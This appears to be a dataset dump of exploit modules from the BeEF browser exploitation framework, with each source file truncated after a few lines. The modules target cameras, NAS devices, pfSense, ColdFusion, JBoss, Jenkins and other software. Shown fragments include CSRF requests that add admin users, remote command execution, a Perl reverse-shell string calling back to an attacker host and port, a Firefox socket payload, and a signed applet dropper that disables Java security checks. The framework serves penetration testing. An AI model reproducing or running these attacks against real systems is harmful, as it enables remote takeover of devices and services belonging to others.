language
stringlengths
0
24
filename
stringlengths
9
214
code
stringlengths
99
9.93M
Assembly Language
beef/modules/exploits/beefbind/shellcode_sources/windows/src/block_sleep.asm
;-----------------------------------------------------------------------------; ; Author: Ty Miller @ Threat Intelligence ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 ; Version: 1.0 (2nd December 2011) ;-----------------------------------------------------------------------------; [BITS 32] ; Input: None ...
Assembly Language
beef/modules/exploits/beefbind/shellcode_sources/windows/src/block_virtualalloc.asm
;-----------------------------------------------------------------------------; ; Author: Ty Miller @ Threat Intelligence ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4 ; Version: 1.0 (2nd December 2011) ;-----------------------------------------------------------------------------; [BITS 32] ; Input: None ...
JavaScript
beef/modules/exploits/boastmachine_3_1_add_user_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var username = '<%= @username %>'; var password = '<%= @password %>'; var...
YAML
beef/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: boastmachine_add_user_csrf: enable: true category: "Exploits" name: "boastMach...
Ruby
beef/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Boastmachine_add_user_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'boastMachine URL', ...
JavaScript
beef/modules/exploits/camera/airlive_ip_camera_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var path = 'cgi-bin/admin/usrgrp.cgi'; var user = '<%= @user %>'; var ...
YAML
beef/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # For more information see: # http://www.exploit-db.com/exploits/26174/ ## beef: module: airlive_add_user_csrf: enab...
Ruby
beef/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Airlive_add_user_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value...
JavaScript
beef/modules/exploits/camera/dlink_dcs_series_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var passwd = '<%= @password %>'; var dlink_dcs_iframe = beef.dom.createInv...
YAML
beef/modules/exploits/camera/dlink_dcs_series_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # More info: http://www.exploit-db.com/exploits/18509/ # beef: module: Dlink_dcs_series_csrf: enable: true ...
Ruby
beef/modules/exploits/camera/dlink_dcs_series_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Dlink_dcs_series_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Camera web root', 'value...
JavaScript
beef/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var path = 'adm/file.cgi'; var passwd = '<%= @password %>'; var l...
YAML
beef/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: linksys_wvc_wireless_camera_csrf: enable: true category: ["Exploits", "Camera"] ...
Ruby
beef/modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web ro...
JavaScript
beef/modules/exploits/coldfusion_dir_traversal_exploit/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // /** * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor . * Inject into the vulnerable "locale" parameter the cl...
YAML
beef/modules/exploits/coldfusion_dir_traversal_exploit/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: coldfusion_dir_traversal_exploit: enable: true category: "Exploits" name: "Col...
Ruby
beef/modules/exploits/coldfusion_dir_traversal_exploit/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Coldfusion_dir_traversal_exploit < BeEF::Core::Command def self.options [ { 'name' => 'fileToRetrieve', 'ui_label' => 'Ret...
JavaScript
beef/modules/exploits/extract_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var timeout = '<%= @timeout %>'; // vali...
YAML
beef/modules/exploits/extract_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: extract_cmd_exec: enable: true category: "Exploits" name: "EXTRAnet Collaborat...
Ruby
beef/modules/exploits/extract_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission ### # Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/ ###...
JavaScript
beef/modules/exploits/farsite_x25_remote_shell/command.js
// beef.execute(function() { var rhost = '<%= @rhost %>'; var scheme = '<%= @scheme %>'; var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; writefile = function() { var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}'; revshell = revshe...
YAML
beef/modules/exploits/farsite_x25_remote_shell/config.yaml
# beef: module: farsite_X25_remote_shell: enable: true category: "Exploits" name: "Farsite X25 gateway remote code execution" description: "This module exploits CVE-2014-7175 to write a payload to the router and CVE-2014-7173 to execute it. Once you have shell...
Ruby
beef/modules/exploits/farsite_x25_remote_shell/module.rb
class Farsite_x25_remote_shell < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host [ { 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore', 'store_fields' => ['http'], 'sto...
JavaScript
beef/modules/exploits/firephp/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // detect firebug if (window.console && (window.console.firebug || window.console.exception)) { var ...
YAML
beef/modules/exploits/firephp/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # ### # Exploit: http://www.justanotherhacker.com/advisories/jahx132.html ### beef: module: firephp_code_exec: enable:...
Ruby
beef/modules/exploits/firephp/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission ### # PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html ### class Firephp_code_exec < BeEF::Core::Command def pre_s...
JavaScript
beef/modules/exploits/firephp/payload.js
(function(){ Components.utils.import("resource://gre/modules/NetUtil.jsm"); var lport = 4444; var rhost = ""; var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"] .createInstance(Components.interfaces.nsIServerSocket); serverSocket.ini...
JavaScript
beef/modules/exploits/glassfish_war_upload_xsrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // // This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com // For more info, refer to: http://blog.ma...
YAML
beef/modules/exploits/glassfish_war_upload_xsrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: glassfish_war_upload_xsrf: enable: true category: "Exploits" name: "GlassFish ...
Ruby
beef/modules/exploits/glassfish_war_upload_xsrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Glassfish_war_upload_xsrf < BeEF::Core::Command def self.options [ { 'name' => 'restHost', 'ui_label' => 'Host', 'type' =>...
JavaScript
beef/modules/exploits/groovyshell_server_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var timeout = '<%= @timeout %>'; // vali...
YAML
beef/modules/exploits/groovyshell_server_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: groovyshell_server_command_execution: enable: true category: "Exploits" name: ...
Ruby
beef/modules/exploits/groovyshell_server_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Groovyshell_server_command_execution < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote H...
JavaScript
beef/modules/exploits/hp_ucmdb_add_user_csrf/command.js
/* * Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ beef.execute(function() { var protocol = '<%= @protocol %>'; var host = '<%= @host %>'; var port = '<%= @port %>'; var usertype = '<%...
YAML
beef/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: hp_ucmdb_add_user_csrf: enable: true category: "Exploits" name: "HP uCMDB 9.0x...
Ruby
beef/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Hp_ucmdb_add_user_csrf < BeEF::Core::Command def self.options [ { 'name' => 'protocol', 'type' => 'combobox', 'ui_label' ...
JavaScript
beef/modules/exploits/jboss_jmx_upload_exploit/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // /** * Jboss 6.0.0M1 JMX Upload Exploit * Ported from l33tb0y Ruby code in Javascript by antisnatchor. * HEAD request with malicious ...
YAML
beef/modules/exploits/jboss_jmx_upload_exploit/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: jboss_jmx_upload_exploit: enable: true category: "Exploits" name: "Jboss 6.0.0...
Ruby
beef/modules/exploits/jboss_jmx_upload_exploit/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Jboss_jmx_upload_exploit < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Target Host',...
JavaScript
beef/modules/exploits/jenkins_groovy_code_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rproto = '<%= @rproto %>'; var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var targetur...
YAML
beef/modules/exploits/jenkins_groovy_code_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: jenkins_groovy_code_exec: enable: true category: "Exploits" name: "Jenkins Cod...
Ruby
beef/modules/exploits/jenkins_groovy_code_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Jenkins_groovy_code_exec < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance lhost = c...
JavaScript
beef/modules/exploits/kemp_command_execution/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var timeout = '<%= @timeout %>'; var p...
YAML
beef/modules/exploits/kemp_command_execution/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: kemp_command_execution: enable: true category: "Exploits" name: "Kemp LoadBala...
Ruby
beef/modules/exploits/kemp_command_execution/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Kemp_command_execution < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'URL', 'value' => 'http...
JavaScript
beef/modules/exploits/local_host/activex_command_execution/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var cmd = beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>'); var result = "command was not ...
YAML
beef/modules/exploits/local_host/activex_command_execution/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: activex_command_execution: enable: true category: ["Exploits", "Local Host"] n...
Ruby
beef/modules/exploits/local_host/activex_command_execution/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Activex_command_execution < BeEF::Core::Command def self.options [ { 'name' => 'cmd', 'ui_label' => 'Command', 'type' => '...
JavaScript
beef/modules/exploits/local_host/java_payload/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var conn = '<%= @conn %>'; var cbHost = '<%= @cbHost %>'; var cbPort = '<%= @cbPort %>'; var...
YAML
beef/modules/exploits/local_host/java_payload/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: java_payload: enable: true category: ["Exploits", "Local Host"] name: "Java Pa...
Ruby
beef/modules/exploits/local_host/java_payload/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Java_payload < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploit...
Text
beef/modules/exploits/local_host/java_payload/README.txt
--- How to use this module --- The following is how you compile the JavaPayload handlers : $git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git $cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar $cd .. && ant compile && ant jar $cd buil...
JavaScript
beef/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var result = "command sent"; try { var command_str = beef.encode.base64.decode('<%= Base64.strict_encod...
YAML
beef/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: mozilla_nsiprocess_interface: enable: false category: ["Exploits", "Local Host"] ...
Ruby
beef/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # This module is a port of the same module from BeEF-0.4.0.0 # It has not been tested class Mozilla_nsiprocess_interface < BeEF::Core::Comma...
JavaScript
beef/modules/exploits/local_host/safari_launch_app/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var baseTag = document.createElement('base'); baseTag.setAttribute('id', 'sla_<%= @command_id %>'); ...
YAML
beef/modules/exploits/local_host/safari_launch_app/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: safari_launch_app: enable: true category: ["Exploits", "Local Host"] name: "Sa...
Ruby
beef/modules/exploits/local_host/safari_launch_app/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Safari_launch_app < BeEF::Core::Command def self.options [ { 'name' => 'app_path', 'ui_label' => 'Application', 'value' =>...
JavaScript
beef/modules/exploits/local_host/signed_applet_dropper/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedAppl...
YAML
beef/modules/exploits/local_host/signed_applet_dropper/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: signed_applet_dropper: enable: true category: ["Exploits", "Local Host"] name:...
Ruby
beef/modules/exploits/local_host/signed_applet_dropper/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Signed_applet_dropper < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/module...
Text
beef/modules/exploits/local_host/signed_applet_dropper/README.txt
--- How to use this module --- -- antisnatchor: - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included) - tested with IE8 on XP SP3, and IE10 on Win7 - tested with JRE 1.6.x and 1.7.x - I advise you to recompile/re-sign the applet yourself, the foll...
Java
beef/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
/* * Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net * Browser Exploitation Framework (BeEF) - http://beefproject.com * * author: antisnatchor */ import java.applet.*; import java.awt.*; import java.io.*; import java.util.*; import java.net.URL; public class SignedApplet extends Applet { public static...
Java
beef/modules/exploits/local_host/signed_applet_dropper/applet/SM.java
/* * Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net * Browser Exploitation Framework (BeEF) - http://beefproject.com * * author: antisnatchor */ import java.security.*; public class SM extends SecurityManager { @Override public void checkPermission(Permission perm) { return; } }
JavaScript
beef/modules/exploits/local_host/window_mail_client_dos/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // container iframe var winmail_container = document.createElement('iframe'); winmail_container.setAttrib...
YAML
beef/modules/exploits/local_host/window_mail_client_dos/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: windows_mail_client_dos: enable: true category: ["Exploits", "Local Host"] nam...
Ruby
beef/modules/exploits/local_host/window_mail_client_dos/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Windows_mail_client_dos < BeEF::Core::Command end
JavaScript
beef/modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var gateway = '<%= @base %>'; var path = '/cgi-bin/system_mgr.cgi'; var cmd = '<%= @cmd.gsub(/'/,...
YAML
beef/modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: dlink_sharecenter_cmd_exec: enable: true category: ["Exploits", "NAS"] name: "...
Ruby
beef/modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission ### # This module has not been tested. For more information see: # http://blog.emaze.net/2012_02_01_archive.html # http://www.securityfocus.co...
JavaScript
beef/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '...
YAML
beef/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # ################################################################################ # For more information see: http://support.freenas.org/tick...
Ruby
beef/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # ################################################################################ # For more information see: http://support.freenas.org/tick...
JavaScript
beef/modules/exploits/ntfscommoncreate_dos/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var dom = beef.dom.createInvisibleIframe(); var num_images = 100; beef.debug('[NtfsCommonCreate DoS] I...
YAML
beef/modules/exploits/ntfscommoncreate_dos/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: ntfscommoncreate_dos: enable: true category: "Exploits" name: "NtfsCommonCreat...
Ruby
beef/modules/exploits/ntfscommoncreate_dos/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Ntfscommoncreate_dos < BeEF::Core::Command def self.options [] end def post_execute save({ 'result' => @datastore['resu...
JavaScript
beef/modules/exploits/opencart_reset_password/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var password = '<%= @password %>'; var opencart_reset_password_iframe ...
YAML
beef/modules/exploits/opencart_reset_password/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: opencart_reset_password: enable: true category: "Exploits" name: "Opencart Res...
Ruby
beef/modules/exploits/opencart_reset_password/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # This module has not been tested class Opencart_reset_password < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui...
JavaScript
beef/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '<%= ...
YAML
beef/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: pfsense_2_3_2_reverse_root_shell_csrf: enable: true category: ["Exploits", "pfSense"] ...
Ruby
beef/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Pfsense_2_3_2_reverse_root_shell_csrf < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instan...
JavaScript
beef/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js
// Function Ajax without JQuery library function ajax(url, method, data, async){ method = typeof method !== 'undefined' ? method : 'GET'; async = typeof async !== 'undefined' ? async : false; if(window.XMLHttpRequest) var xhReq = new XMLHttpRequest(); else var xhReq = new ActiveXObject("...
JavaScript
beef/modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '...
YAML
beef/modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: pfsense_reverse_root_shell_csrf: enable: true category: ["Exploits", "pfSense"] ...
Ruby
beef/modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance l...
JavaScript
beef/modules/exploits/php-5.3.9-dos/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830) // PoC written by Paul Westin // PoC ported...
YAML
beef/modules/exploits/php-5.3.9-dos/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: php_dos: enable: true category: "Exploits" name: "PHP 5.3.9 DoS" d...
Ruby
beef/modules/exploits/php-5.3.9-dos/module.rb
